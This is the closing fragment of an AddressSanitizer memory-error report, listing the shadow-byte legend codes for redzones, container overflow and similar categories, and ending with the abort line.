Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==49759==ABORTING